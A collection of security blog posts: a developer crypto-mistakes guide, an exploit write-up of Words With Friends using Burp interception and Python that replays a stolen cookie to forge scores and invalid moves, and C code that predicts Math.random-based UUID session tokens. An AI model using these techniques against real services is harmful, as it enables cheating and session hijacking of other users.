It wasn’t until VSH that it dawned upon me that you don’t have to be the greatest mathematical mind to make an impact. Think of great impacts like RSA: it was just a coincidence that it was invented by some of the best cryptographers ever, but mathematically it really is very simple. Another example is Shamir Secret Sharing: such a simple concept with great impact: it is only a coincidence that it was invented by the greatest cryptographer ever! My point is that don’t be intimidated like I was just because other people know more – often simple ideas have the biggest impact. Try a lot of ideas, and be creative and persistent.

It really helps a lot to master some mathematical tools. For me, smoothness was what helped me, and it had only been used minimally for constructive purposes in cryptographry before.

Many times I thought to myself “I really need to master lattices”, but then later dismissed it: “I’m too late: all the low hanging fruit is gone.” I was so wrong: it was never too late!

Why I left cryptography

If there is interest, in a future blog I will write about why I left cryptography.

Top 10 Developer Crypto Mistakes

After doing hundreds of security code reviews for companies ranging from small start-ups to large banks and telcos, and after reading hundreds of stack overflow posts on security, I have composed a list of the top 10 crypto problems I have seen.

Bad crypto is everywhere, unfortunately. The frequency of finding crypto done correctly is much less than the number of times I find it done incorrectly.  Many of the problems are due to complex crypto APIs that are insecure by default and have have poor documentation. Java is the biggest offender here, but it does not stand alone. Perhaps Java should learn from its archenemy, .Net, on how to build a crypto API that is easier to use and less prone to security problems.

Another reason for so many problems is that finding the issues seems to require manual code analysis by a trained expert. According to my experience, the popular static analysis tools do not do well in finding crypto problems. Also, black-box penetration testing will almost never find these problems. My hope in publishing this list is for it to be used by both code reviewers and programmers to improve the state of crypto in software.

The list:

1. Hard-coded keys
2. Improperly choosing an IV
3. ECB mode of operation
4. Wrong use or misuse of a cryptographic primitive for password storage
5. MD5 just won’t die. And SHA1 needs to go too!
6. Passwords are not cryptographic keys
7. Assuming encryption provides message integrity
8. Asymmetric key sizes too small
9. Insecure randomness
10. “Crypto soup”

Now we break it down in detail:

1. Hard-coded keys

I have seen this very often. Hard-coding keys implies that whoever has access to the software knows the keys to decrypt the data (and for those developers who start talking about obfuscation, my 10th entry is for you). Ideally, we never want cryptographic keys accessible to human eyes (for example, see what happened to RSA about six years ago). But many companies fall far short of this ideal, and therefore the next best thing we can ask is to restrict access to the keys to a security operations team only. Developers should not have access to production keys, and especially those keys should not be checked into source code repositories.

Hard-coded keys is also indicative of insufficient thought about key management. Key management is a complex topic that goes well beyond the scope of this blog.  But what I will say is if a key gets compromised, then rotation of a hard-coded key requires releasing new software that must be tested before going live.  Releasing new software takes time, which is not a luxury when incidents like this happen.

It’s easy for security people to tell developers what not to do, but the unfortunate reality is that what we really want them to do is often not feasible for whatever reason. Therefore, developers need some middle-ground advice.

A big caveat here that I am not a security operations person nor an expert on key management, but I can comment on what I have seen from a distance in some places.  Even though it is less than ideal, a configuration file is a better option for key storage than hard-coding it. Although some frameworks support encrypted configuration sections (see also this .Net guidance) what is really needed is for developers to have test keys for their test and development environments, and these keys are replaced by real keys by a security operations team upon deployment into the live environment.

The above guidance I have seen this botched up in practice. In one case, the deployment team put in an RSA public key incorrectly, and was not able to decrypt because they didn’t have a private key corresponding to the erroneous public key. My advice is that the software needs a means to test itself to make sure it can encrypt/decrypt (or whatever operation it needs to do), or else there needs to be a procedure as part of the deployment to make sure things work as expected.

2. Improperly choosing an IV

IV means initialization vector.  This problem is usually with CBC mode of encryption. Very often it is a hard-coded IV, usually all 0s. In other cases, some magic is done with a secret (sometimes the key itself) and/or a salt, but the end result is that the same IV is used every time. The worst one I have seen, on three occurrences, is the key also used as the IV — See Section 7.6 of Crypto 101 on why this is dangerous.

When you are using CBC mode of operation, the requirement is that the IV is chosen randomly and unpredictably.  In Java, use SecureRandom.  In .Net, simply use GenerateIV.  Also, you cannot just choose an IV this way once and then use the exact same IV again for another encryption.  For every encryption, a new IV needs to be generated. The IV is not secret and is typically included with the encrypted data at the beginning.

If you do not choose your IV properly, then security properties are lost. An example of improper choice of IV where the implications were huge is in SSL/TLS.

Unfortunately, APIs are often the problem here. Apple API is a perfect example of what not to do (note: I am using  this mirror of Apple’s code so I can link directly to the evidence) — tell developers it is optional and use all zero if it is not provided. Sure, it will still encrypt and decrypt, but it is not secure Apple!

More information about requirements for IVs and nonces in various modes of operation is given here.

3. ECB mode of operation

When you encrypt with a block cipher such as the AES, you should choose a mode of operation.  The worst one you can choose or have chosen for you is ECB mode, which stands for Electronic Code Book.

It doesn’t matter what block cipher is under the hood: if you are using ECB mode, it is not secure because it leaks information about the plaintext. In particular, duplicate plaintexts become duplicate ciphertexts. If you think that doesn’t matter so much, then you probably have not seen the encrypted penguin yet either (this image is Copyright Larry Ewing, lewing@isc.tamu.edu, and I am required to mention The GIMP):

ECB_Penguin

Bad APIs, like Java, leave it up to the provider to specify the default behaviour. Typically, ECB is used by default. Embarrassingly, OWASP gets this wrong in their “Good Practice: Use Strong Algorithms” example, though they get it right here, which is one of the few places on the internet that looks to be free of problems.

Bottom line: Don’t use ECB mode.  See here for guidance on modes that are safe to use.

4. Wrong use or misuse of a cryptographic primitive for password storage

When a crypto person sees PBKDF2 being used with 1000 iterations for password storage, they may complain that 1000 iterations is too few and a function like bcrypt is a better choice anyway. On the other hand, I have seen so much worse that I’m just excited that the developer is on the right track.

Part of the problem here is terminology, which the cryptographic community has made no effort to fix. Hash functions are wonderful, magical functions. They are collision resistant, preimage resistant, 2nd preimage resistant, behave like random oracles, and they are both fast and slow at the same time. Maybe, just maybe, it is time to define separate cryptographic functions for separate purposes rather than relying too much upon a single source of magic.

For password processing, the main properties we need are slow speed, preimage resistance, and 2nd preimage resistance. The slow speed requirement is explained wonderfully by Troy Hunt.

There are specific functions designed to meet these goals: pbkdf2, bcrypt, scrypt and argon2. Thomas Pornin has played an excellent role in helping developers and security engineers understand this. Now if only we can get rid of the MD5, SHA1, SHA256, and SHA512 implementations for processing passwords!

Also, I sometimes see APIs that make available PBKDF1, which really should not be used any more. Examples include Microsoft and Java.

Additionally, another common problem I see is hard-coded salts when doing password processing. One of the main purposes of the salt is so that two identical passwords do not “hash” to the same value. If you hard-code the salt, then you lose this property. In this case, one who gets access to your database can readily identify the easy targets by doing a frequency analysis on the ‘hashed’ passwords. The attacker’s efforts suddenly become more focused and more successful.

For developers, my recommendation is to do what Thomas Pornin says. He has commented on various aspects of password processing frequently on the security stack exchange.

Personally, I would go with bcrypt if that is possible. Unfortunately, many libraries only give you PBKDF2. If you are stuck with that, then make sure you use at least 10,000 iterations and be happy that your password storage is better than most.

5. MD5 just won’t die. And SHA1 needs to go too!

MD5 has been broken in practice for more than 10 years, and there were warnings against using it for more than 20 years.  Yet I am still finding MD5 in many, many places. Often, it is being used in some crazy way where it is not clear what the security properties are that they need.

SHA1 has been broken in theory almost as long as MD5, but the first real attack only came recently. Google has been doing well in deprecating from certificates years before the practical break, however SHA1 still exists in developer code in many places.

Whenever I see developer code using a cryptographic hash function, I get worried. Often they do not know what they are doing. Hash functions are wonderful primitives for cryptographers to use in building useful cryptographic primitives such as message authentication codes, digital signature algorithms, and various prngs, but letting developers do what they please with them is like giving a machine gun to an 8 year old. Developers, are you sure these functions are what you need?

6. Passwords are not cryptographic keys

I see this often: not understanding the difference between a password and a cryptographic key. Passwords are things people remember and can be arbitrary length. Keys on the other hand are not limited to printable characters and have fixed length.

The security issue here is that keys should be full entropy, whereas passwords are low entropy by nature.  Sometimes you need to change a password into a key.  The proper way to do this is with a password based key derivation function (pbkdf2, bcrypt, scrypt or argon2), which compensates for the low entropy input by making the derivation of the key from the password a time consuming process.  Very seldom do I see this done.

Libraries like Crypto-js blend the concepts of keys and passwords together, and inevitably people who use it wonder why they cannot encrypt in JavaScript and then decrypt in Java or .Net or whatever other language/framework. Worse, the library uses some awful algorithm based upon MD5 to convert the password to a key.

My advice to developers is whenever you find an API that offers passwords or passphrases to encrypt, avoid it unless you specifically know how the password is converted to a key. Hopefully, the conversion is done with an algorithm such as PBKDF2, bcrypt, scrypt, or argon2.

For APIs that take keys as input, generate the keys using a cryptographic prng such as SecureRandom.

7. Assuming encryption provides message integrity

Encryption hides data, but an attacker might be able to modify the encrypted data, and the results can potentially be accepted by your software if you do not check message integrity. While the developer will say “but the modified data will come back as garbage after decryption”, a good security engineer will find the probability that the garbage causes adverse behaviour in the software, and then he will turn that analysis into a real attack. I have seen many cases where encryption was used but message integrity was really needed more than the encryption. Understand what you need.

There are certain encryption modes of operation that provide both secrecy and message integrity, the best known one being GCM. But GCM is unforgiving if a developer reuses and IV. Given how frequent the IV reuse problem is, I cannot recommend GCM mode.  Alternative options are .Net’s Counter with CBC-MAC and Java BouncyCastle choices of CCMBlockCipher, EAXBlockCipher, OCBBlockCipher.

For message integrity only, HMAC is an excellent choice. HMAC uses a hash function internally, and the specific one is not too important. I recommend that people use a hash function such as SHA256 under the hood, but the truth is that even HMAC-SHA1 is quite secure even though SHA1 lacks collision resistance.

Note that encryption and HMAC can be combined for both secrecy and message integrity. But the catch here is that the HMAC should not be applied to the plaintext but instead to the ciphertext combined with the IV.  Acknowledgments to the good people at /r/crypto for correcting earlier versions of this section.

8. Asymmetric key sizes too small

Developers do really well in choosing their symmetric key sizes, often choosing much stronger than they need (128-bit is enough). But for asymmetric crypto, they often err on the other side.

For RSA, DSA, DH, and similar algorithms, 1024-bit is within reaching distance of an organisation such as the NSA, and will soon become reachable by smaller organisations with Moore’s law. At the very least, using 2048-bits.

For elliptic curve based systems, one can get away with much smaller key sizes. I have not seen these algorithms used by developers so often, so I have not seen problems with key sizes for them.

General guidance on key sizes is provided here.

9. Insecure randomness

I’m surprised that this does not occur more often, but I do find it from time to time. The general issue is that typical (pseudo) random number generators may look random to the untrained eye, but they fail to meet the unpredictable requirement to the trained expert.

As an example, imagine you are using java.util.Random to generate a session token for a web application. When I as a legitimate user get my session token, I (using my crypto expertise) can then predict the next session token for the next user and the previous session token for the previous user. I can then hijack their sessions.

This would not be possible if the session token is generated with SecureRandom. The general requirement is a pseudo random number generator with cryptographic security. In .Net, the good source is System.Security.Cryptography.RandomNumberGenerator.

It is also worth mentioning that just because you are using a good source of randomness does not mean that you cannot screw up. For example, I saw one implementation that took a 32-bit integer from SecureRandom and hashed it to produce a session token. It never occurred to the developer that that implies at most 2^32 possible sessions, which would allow an attacker to hijack one just by enumerating these values.

10. “Crypto soup”

I use this term to mean a developer mixing a bunch of cryptographic primitives together without a clear goal. I don’t like to call it roll-your-own-crypto, because I think of that term attempting to build something where the goals are clear, such as a block cipher.

Crypto soup often uses hash functions, and at this point you may want to have a second look at my final paragraph for point 5. When I see this, I want to scream to the developer “get your hands off that hash function, you don’t know what you’re doing!”

I remember one case of crypto soup where the developer used a hard-coded key. I told him that it is unclear what you are trying to do, but you cannot use hard-coded keys. This caused him a lot of trouble because they didn’t have a clear path forward to getting the key out of the source. Eventually, he explained that he didn’t really need security for what he was doing, but instead he was just trying to obfuscate. Huh? This is exactly the type of conversation one tends to get into when you see crypto soup.

Concluding remarks

To improve the state of crypto in developer code, I make the following recommendations:

  • We need more educators!  I’m talking about people who understand crypto and also developer code.  I am pleased to find some very good people on Stack Overflow, but it is still the case that there is a lot of bad guidance all over the internet.  More good people need to help correct this.
  • Crypto APIs need to get better.  Using cryptographic functionality correctly needs to be easy.  It needs to be secure by default.  And the documentation needs to be very clear about what is happening.  Microsoft is going the right direction, Java is not.
  • Static analysis tools need to improve.  Some of the issues above the tools will not be able to find, but others they should be able to.  I am aware of one called Cryptosense, but unfortunately I have not had the benefit to try it.  I have played a lot with big name tools and have been disappointed due to their lack of findings.
  • Code reviewers need to manually search for crypto problems.  It really is not that hard.  Start by doing a grep -Rli crypt (see how to do equivalent in Powershell) to get a list of files that contain the word “crypt”.  Also search for MD5 and so on.
  • Crypto researchers need to more attached to real-world security problems.  If people like Dan Boneh and his colleagues can do research like this, then others can as well.  We need a lot more help to clean up the world’s crypto mess.

Words With Friends Trusts The Clients A Little Too Much

Words With Friends is a Scrabble-like game, which boasts being the world’s most popular word game.

Through a combination of an intercepting proxy and a partially reverse engineered Word with Friends client, we made a number of interesting discoveries. Among them are:

  • How to make your average points per move and your weekly points tally ridiculously high.

  • How to see the letters your opponent has, and the next letters that will be drawn.

  • How to play invalid “words”.

  • How to play words that are not connected to any other words on the board.

Getting Started: Using an Intercepting Proxy

I’ll describe how to do this with an iOS device running Words With Friends and a Mac.  Details for other computers and devices need to be found elsewhere.

We are going to set it up so you can inspect and intercept the iOS communications on your Mac. Download the Burp proxy on your Mac (the free version is sufficient), and follow these instructions to get the Mac intercepting un-encrypted communications from the iPad. Then start your iOS browser and go to an http site (not https) to verify that the the communications are passing through the Mac. If things seem stuck, make sure the intercept is turned off. This youtube tutorial is a decent introduction for those who have not used Burp before.

The next step is to be able to get encrypted (https) communications passing through the Mac. To do so, you need to install the Burp root certificate (from your Mac) onto your iOS device. This can be done following these instructions.

You should now have everything from your iOS device going through Burp on your Mac. Verify this by visiting an https website in your browser, and checking on Burp that the communications are traveling through.

After you have complete this, you may now start Words With Friends. The communications should be traveling through Burp. The fun begins now.

The Mystery of Billy The Kid

If you have a version of Words With Friends that supports a global leaderboard, you may have noticed that nearly every week there is a guy named Billy The Kid who is on the top. If you looked further, you may have noticed his average word per move is almost always 1999 points. How can one possibly average this many points per word? Answer: he set up his client to lie to the Words With Friends server about his score, and you can too.

If you turn the Burp intercept on immediately prior to making a move, you will see something like this for the content (potentially sensitive content blurred out):

qghsqpfThe version of Words With Friends here uses XML, but later versions use JSON. Regardless, notice the highlighted “points=33”. You can change that points value to a large value and the server will believe it provided that you keep the new value under 2000. Hence, in Burp intercept, we could change it to something like 1933:

7pktkps

This will not affect the score on the clients, which is computed independently, but it will be figured into your average and weekly points tally. The above case interception was done on my son’s account while he was playing. He was very excited to see how much his average shot up after a few plays – see below (full identity blurred out). He was #1 in the world until Billy The Kid showed up a couple days later.

q8z1xmh

For those concerned parents, no I am not teaching my child to hack and cheat, but instead asked him to volunteer for my proof-of-concept experiment. We only did it this one session! 🙂

Digging Deeper: Building Your Own Words With Friends Client

Looking again at the HTTP POST for playing a word, the next question we ask is whether we can play arbitrary words by changing the words parameter in the query string. It doesn’t work. When I first tried it, I assumed it was the board_checksum in the POST body that was making it fail, but in retrospect I now think the text tag might have also caused a problem.

To deal with these problems, I Googled for Words with Friends board_checksum, and I found a partially reverse engineered Python client written by Jahn Veach. This code is really nicely written, but does not yet provide the server API calls to play moves. Nevertheless, Jahn had done most of the hard part in terms of providing a Words with Friends Python client.

I made a local copy and updated Jahn’s code to make it play words and do a few other communications with the server. Also, Jahn’s code expects XML communications, which is what you saw in the HTTP POST in the previous section, but more recent Words With Friends clients use JSON. I like JSON much better than XML, so I updated his code to use JSON.

I’m not going to make my code available, because last thing I want is a bunch of script kiddies cheating and ruining the game for everyone. But for those who want to go further than what I did, I’ll tell you a bit about it (and please, don’t make cheating clients publicly available).

The main thing you need to communicate with the Words With Friends server is the cookie, which you can intercept through Burp. Alternatively, Jahn tried to set up his code so that you can log in, but I just use my intercepted cookie to communicate with the server. Once you have the cookie, the following Python API call can be used to make a move:

def api_send_move( url, move_string, points, words, cookie ):
    headers = {'Content-Type': 'application/json',
            'Accept': 'application/json',
            'User-Agent': 'NewWordsWithFriendsFree/3.403 CFNetwork/711.3.18 Darwin/14.0.0',
            'Cookie': cookie
            }
    params = { 'points': str(points), 'words': words }
    r = requests.post( url, headers=headers, params=params, data=move_string )

    return r.text

The move_string is a JSON string that can be obtained by a json.dumps( ) of a structure like this:

            jsonMove = {
                "move": {
                    "from_y": moveObj.fromY, 
                    "from_x": moveObj.fromX, 
                    "move_index": moveObj.moveIndex,
                    "text": moveObj._text, 
                    "to_x": moveObj.toX, 
                    "to_y": moveObj.toY, 
                    "board_checksum": moveObj.boardChecksum,
                    "promoted": moveObj.promoted, 
                    "game_id": moveObj.gameId
                }
            }

The moveObj is an object from the Move class in Jahn’s code. I have Python code that populates this. Currently my code only allows contiguous moves. The code is below, where selected is a list containing the letters selected from your latter rack and h_or_v tells whether the word is horizontal or vertical:

    moveObj = Move()
    moveObj.gameId = game.id
    moveObj.userId = player_id
    moveObj.fromX = x_coord
    moveObj.fromY = y_coord
    if h_or_v == 'h': # horiztonal
        moveObj.toX = x_coord + len(word)-1
        moveObj.toY = y_coord
    else:   # vertical
        moveObj.toX = x_coord
        moveObj.toY = y_coord + len(word)-1
    moveObj.moveIndex = len(game.moves)
    moveObj.text = None
    if (len(word)) == 1:
        moveObj.promoted = 3    # one letter words have promoted = 3
    elif h_or_v == 'h':
        moveObj.promoted = 1    # horizontal moves have promoted = 1
    else:
        moveObj.promoted = 2    # vertical moves have promoted = 2
    moveObj.boardChecksum = None    # This will be computed when board is updated
    moveObj.player = current_user
    moveObj._text = ""
    for i in range(len(word)):
        for j in range(len(rack)):
            if selected[j] == i+1:
                moveObj._text += str(rack[j]) + ","
    workingGame.addMove( moveObj )

If you want to play a word that goes across other letters already played (i.e. non-contiguous moves), then the moveObj._text needs to include “,*” to represent the letters that were already on the board. Additionally, the moveObj.toX or moveObj.toY needs to be adjusted for those letters as well.

As I mentioned above, not only did I need the board_checksum to make this work, but I also think the text XML tag (or JSON tag) was needed. It contains the identity of the letters you played. That identity is according to the LETTER_MAP in Jahn’s code. The code above computes both the board_checksum and the text tags.

I also had to update the code to get a list of your games in JSON format. I threw in a few kludges to make it work (this needs to be cleaned up!):

def api_get_games( url, cookie ):
    headers = {'Content-Type': 'application/json',
            'Accept': 'application/json',
            'User-Agent': 'NewWordsWithFriendsFree/3.403 CFNetwork/711.3.18 Darwin/14.0.0',
            'Cookie': cookie
            }
    params = { 'game_type': 'WordGame',
            'include_invitations': 'true',
            'games_since':'0001-12-30%2000:00:00+00:00',
            'get_current_user':'true',
            # move_since seems to represent a time in milliseconds, where time 0 is approx 14 December 2009
            'moves_since':'195000000000',
            'last_read_chats_since': '1455000000',
            'chat_messages_since': '9783000000' }
    r = requests.get( url, headers=headers, params=params )

Playing Invalid Words With Python Client

The first thing I wanted to try was playing an arbitrary collection of letters to see if Words With Friends would accept it. I expected this to work for two reasons:

  1. Somebody once played the non-word “IZ” against me, which set me off to Googling about invalid words.

  2. I came across this blog, which describes a Words With Friends hacked client that allows you to play arbitrary words.

The next thing I needed was a candidate player to try it on. I’ve been playing Words With Friends long enough that I do not even blink when I see words like QOPH, ZLOTE, HADJI, AZINE, GHI, OAKUM, etc…, so if I’m going to try an arbitrary word, it needs to be against somebody who is pretty obviously cheating (i.e. using external tools to assist in the game).

My candidate: Donna (full identity omitted), who has played a number of suspicious words against me including: KIAUGH, SHEQEL, QINDARS, AECIUM, TRIJET, ARCHAIST, SCHAV, BULIMIC, SHULN. I think she’s cheating: while it is possible that a good player would know a few of these, knowing all of these is extremely unlikely, and being able to identify those words amongst a set of scrambled letters is even more unlikely.

So, here’s what I did. As you can see, from the legitimate client, AIRESHOR is not a word:

egu4pcu

Using my Python client, I attempted to play it (only showing part of the board):

lvr1qlc

The legitimate client accepted it:

hj15vk0

There you have it: no server-side enforcement of the rules!

Donna, if you’re out there reading this blog, sorry, but next time you’re just going to have to cheat a lot harder to beat me again.

Playing Disconnected Words

The next thought: if I can play invalid words, can I also play disconnected words? Yep:

cnzbtzz

Knowing Your Opponent’s Letters and the Next Letters to Be Drawn

Further inspection of the communications with Burp reveals that a random_seed (or random-seed) is sent from the server to the clients. Jahn’s code tells everything you need to know about this. The value is fed into a Mersenne Twister Pseudo Random Number Generator (mersenne.Mersenne in the code), which by the way is not cryptography secure, but that’s the least of the problems here. The Mersenne Twister is used to select the letters you and your opponent draw next from the letter rack (drawFromLetterBag in the code).

The clients keep track of the letters you have and the letters your opponent have. One can simply output those letters if they wanted to build a cheating client.

Please Don’t Cheat

I will never understand what joy people get knowing that they can beat somebody by cheating.  My Python client was not developed for the purpose of cheating, but instead was something that I developed out of curiosity.  As stated above, it was motivated by understanding how Billy The Kid was getting such a high average, and how somebody played an invalid word against me.  I have mostly used it for proof of concepts, though I did use it to get revenge against Donna, a very serious cheater.  That’s about it.

I love playing Words With Friends, and it burns me up when people like Donna cheat. Yes, these people are always going to exist, but if somebody built a client like mine and made it public, then it’s only going to get a lot worse for everybody.  With great power comes … ahh, forget it, you already know that cliché.

What Should (Have) Zynga Do(ne)?

If Zynga would have architected the game according to security guidance, they would have done all rules enforcement on server side, and they should also be processing the letter draw from the server side rather than passing a seed to the clients and trusting them to do it.

I very much doubt that they are going to completely re-architect their game because of this. So, what are the dirty shortcut solutions they could have done to prevent people like me and Jahn from looking under the hood?

  • Prevent reverse engineering: code obfuscation. Sure, the security purists will tell you that that only slows down a hacker but never stops the hacker. My response: Words With Friends is 7 years old with no public hacked client.  Given that it is one of the most popular games out there, and given how easy it is to do what Jahn and I have done, it seems to me that the hackers don’t even have the time or motivation to do the simple stuff against Words With Friends, let alone the hard stuff. And by the way, I truly wish those hackers good luck in their efforts to beat something like Arxan. I fully agree that it is not impossible, but in practice, good luck. Alternatively, Zynga could have used the lower cost Dexguard to provide some level of hurdle to prevent reverse engineering.

  • Prevent intercepting proxy: I would not have been able to do what I did had Zynga used certificate pinning. It is certainly possible that certificate pinning could be bypassed, but it would require a lot more work, especially if obfuscation is used.  Update: See comment from Parsia about certificate pinning.

The two suggestions together might have been all they needed.

Zynga has a bug bounty program. They offer no financial reward, but the Hall of Fame is attractive to some white hats. I did not expect that the issues in this blog would qualify for their bug bounty program, but I emailed them nevertheless on 27th February 2016. They have not replied or acknowledged my email.

If I were Zynga, I would enforce a mandatory upgrade of clients and include the above two recommendations in it.  If they force incompatibility with previous clients, then they may be able to prevent somebody from developing a cheating client that could spoil the game for everyone.

How To Play Words With Friends Like a Pro (Without Cheating!)

15792164235_392be62cf3_c

Alright, now I feel compelled to conclude my blog with some tips and tricks to the game to help get your average over 30 points per move and your average game score around 400. So here we go:

  • Before you look at the board, look at the letters in your hand to see if you can form a bingo (i.e. using all 7 letters).
  • When looking at the letters in your hand to form a bingo, group suffixes such as the following together: ING, ERS, ER, ED, IER, IST, IEST, ISH, ….
  • When looking at the letters in your hand to form a bingo, group prefixes such as the following together: OVER, OUT, UN, RE, ….
  • Don’t always play with the greedy strategy: if you have N and G in your hand but not I, then save the two letters until you draw an I so that you later have ING. A small sacrifice in points in the earlier move can be a big gain in points later.
  • Don’t play an S or a blank unless it is increasing your score by at least 10 more points than the best word you can find without playing the S/blank.
  • Don’t be satisfied with less than 35 points when playing the letter X.  X can be combined with any vowel to form a 2-letter word (AX, EX, XI, OX, XU) so forming two 2-letter words with the X on a double-point square will give you at least 35 points most of the time.
  • Know all two letter words  (GI should also be on the list).
  • Know the English spelling of the letters in the Greek and Hebrew alphabets.
  • Remember, at the end of the game the person who goes out first gets a bonus: the total points of letters still in his opponent’s rack are subtracted from the opponent’s score and added to his score. It’s mathematically equivalent to adding a bonus of double the number of points remaining in that rack and not subtracting any from the other rack. For this reason, rather than maximising your points per word at the end of the game, instead try to maximise your points per word minus two times the sum of the points of the letters that remain in your rack after your word is played.
  • Don’t be afraid to swap letters when you have junk. I do it two or three times a game on average. BTW, swapping letters does not affect your weekly average points per move.
  • Take your time! This is not Scrabble, so don’t be afraid to spend more than a few minutes to find that big word!
  • Of all the features that Words With Friends has, the one that I think is most exploitable is the word-meter, because it can often tell you enough information about where the best word is that you can figure out that best word. As an example, I once thought I had a great word: ZAIRE for 68 points. But when I checked it with the word-meter, it went up only a few bars. I then estimated how big the best word must be based upon the percentage of bars showing up.   The estimate turned out to be close to 300 points. Next, I looked on the board for where would it be possible to get a word that big, and the only way it could possibly happen, I reasoned, was a word covering both a triple word score and a double word score, and the Z was on the triple letter score. Then noticing the ING combination (the N was already on the board, I had I and G), it was only a matter of a couple minutes before I found my highest word ever: TEAZLING for 275 points (and no, I never heard that word before).

Teazling

Have fun.  My longest words are DISJUNCTION and OVERGRAZING (11 letters each), my biggest word is 275 points, and my highest scoring game is 800 (against a really weak opponent, but I have got in the 700s a few times against decent opponents).  What’s yours?

 

Cautionary note: UUIDs generally do not meet security requirements

Some time ago, I was doing a web application penetration test, and noticed that the authentication tokens were UUIDs. This I knew was risky, and in fact if you read the UUID rfc, section 6 of it warns:

Do not assume that UUIDs are hard to guess; they should not be used as security capabilities (identifiers whose mere possession grants access), for example.

As a penetration tester, I was salivating over the thought that I could possibly find the ultimate attack on the application: being able to hijack sessions by predicting past and future UUIDs given a single UUID that I got for my authentication. But this of course is only possible if I knew how the UUIDs were being generated, and there is no fixed standard on their implementation. So what could I do? Ask the developers of course!

Discussion with one of the developers revealed that the UUIDs were generated on the server side in JavaScript using code called randomUUID(). JavaScript on the server side? I thought it must be Nodejs, but the developer said it was not. Instead, he insisted that they were using both Java and JavaScript on the server side, but the UUIDs are generated in JavaScript. Hmmm, I thought I should just take his word for it.

So I Google for randomUUID JavaScript, and this turned up:

function randomUUID() {
  var s = [], itoh = '0123456789ABCDEF';

  // Make array of random hex digits. The UUID only has 32 digits in it, but we
  // allocate an extra items to make room for the '-'s we'll be inserting.
  for (var i = 0; i < 36; i++) s[i] = Math.floor(Math.random()*0x10);

  // Conform to RFC-4122, section 4.4
  s[14] = 4;  // Set 4 high bits of time_high field to version
  s[19] = (s[19] & 0x3) | 0x8;  // Specify 2 high bits of clock sequence

  // Convert to hex chars
  for (var i = 0; i < 36; i++) s[i] = itoh[s[i]];

  // Insert '-'s
  s[8] = s[13] = s[18] = s[23] = '-';

  return s.join('');
}

Ahhh, good! It uses Math.random( ), which almost certainly is not cryptographically secure, so now it was just a matter of finding out how Math.random( ) was implemented in JavaScript. More Googling revealed this C equivalent of the function.  Further research revealed that the stack overflow post was not quite correct: a division by 2^32 was necessary at the end to convert the number between 0 and 1. Thus the code looks like this:

uint32_t V8::Random() {
    // Random number generator using George Marsaglia's MWC algorithm.
    static uint32_t hi = 0;
    static uint32_t lo = 0;

    // Initialize seed using the system random(). If one of the seeds
    // should ever become zero again, or if random() returns zero, we
    // avoid getting stuck with zero bits in hi or lo by reinitializing
    // them on demand.
    if (hi == 0) hi = random();
    if (lo == 0) lo = random();

    // Mix the bits.
    hi = 36969 * (hi & 0xFFFF) + (hi >> 16);
    lo = 18273 * (lo & 0xFFFF) + (lo >> 16);
    return ((hi << 16) + (lo & 0xFFFF)) / Math.pow(2, 32);
}

As a cryptographer, it didn’t take me very long to see that this pseudo random number generator (prng) has a problem, and thus I was at this point overly excited that I could easily break the UUID generator. I spent a couple hours implementing my attack, and sadly, it turned out not to work. Why?

I went back to the developer and asked him “are you sure you are using JavaScript to generate the UUIDs?” He double-checked, and found out that in fact that they were calling Java’s uuid.randomUUID(). So I looked into that, and found:

The UUID is generated using a cryptographically strong pseudo random number generator.

At this point I gave up.

A recent blog

I regularly read reddit’s netsec subredit, and a couple days ago there was an extremely popular blog posted there based upon the problems with the above prng: TIFU by using Math.random().

This author was mainly interested in the prng for the lack of collisions property, but not cryptographic purposes. He explained in fine detail the problem with the prng. I read through the blog thinking to myself “Gee, I noticed that a while back. Maybe I should have written my own blog about this!”

So today I decided to just add a little extra example of what’s wrong with that prng, this time focusing on its use for cryptographic purposes. I illustrate that it is absolutely trivial to break the JavaScript randomUUID() when it is used for something like authentication tokens. This also fits in well with my previous blog, which showed how to break a number of amateur cryptographic designs.

Breaking the randomUUID() function

If you have not read the blog post above on the fault with the prng, then here’s my own short description. We will work from the C code implementation of Math.random( ) above.

The state consists of (hi, lo), which are both 32-bit unsigned words. It would seem that one needs to try 2^64 combinations to get the state, however it turns out that in our case, we don’t need to. Look at the return value:

return ((hi << 16) + (lo & 0xFFFF)) / Math.pow(2, 32);

Let’s break it down:

  • (hi << 16) is shifting hi 16-bits to the left. The highest 16-bits get shifted off, the least significant bits get moved to most significant bits positions.
  • (lo & 0xFFFF) means adding on the least significant 16-bits onto the above value.

So the net result is that the (l0 & 0xFFFF) does not interfere with the (hi << 16). After the division by 2^32, we get a fractional number between 0 and 1.  If we think about the binary expansion of this fractional number, the first 16-bits after the decimal point come from hi, the next 16-bits come from lo.

The other observation about the Math.random( ) function is that this is the only place where the two state words get mixed. So this tells us that if we only care about the most significant bits from the output, then the lo value does not get mixed in. And that means that we can brute force the part of the prng state that we care about by only concentrating on the hi value, which has 2^32 possibilities. That’s quick and easy to do on a desktop computer.

As you might have seen by now, the randomUUID() function above only uses a few most significant bits. Each nibble of the UUID string is calculated from:

s[i] = Math.floor(Math.random()*0x10);

The ‘0x10’ is the hexadecimal value of 16: in other words, we are shifting the random value left by 4 bits. This means that only the most significant 4 bits from hi get pushed past the decimal point, and then Math.floor( ) drops the remaining bits.

Implementing the attack

The attack is actually quite trivial. We get one UUID, and then we brute force (2^32 possibilities) the hi value that could have caused it. Note: if you are a cryptographer, you can likely find a more clever way than brute forcing hi, but with only 2^32 possibilities, why bother?

Once we have the hi value, we can compute future outputs of the prng that will produce the same UUIDs regardless of what lo is. That means that you can set lo to whatever you want: the attack will work with any value.

So in C, the search would look something like this:

static unsigned int hi = 0, lo = 0;     // initialise with dummy values
int main( int argc, char** argv ) {
    unsigned char uuid[37], *target_uuid;
    int i;
    unsigned int candidate_hi;

    if (argc < 2) {
            printf("usage: %s uuid\n\n", argv[0]);
            return -1;
    }

    target_uuid = argv[1]; // input validation omitted for brevity
    printf("Computing...\n");
    candidate_hi = 0; uuid[36] = '\0';
    // main loop
    do {
        hi = candidate_hi;
        // generate randomUUID using candidate_hi as the seed,
        // store result in the string uuid.
        randomUUID( uuid );
        if (!strncmp( uuid, target_uuid, 36 ))
            break;
        ++candidate_hi;
    } while (candidate_hi != 0);

    if (candidate_hi != 0) {
        int i;
        printf("\nThe value of hi is %u,", hi );
        printf(" and the next 10 UUIDs are:\n");
        for (i=0; i < 10; ++i) {
            randomUUID( uuid );
            printf("\t%s\n", uuid );
        }
    }
    else
        printf("No solution found.\n");
    return 0;
}

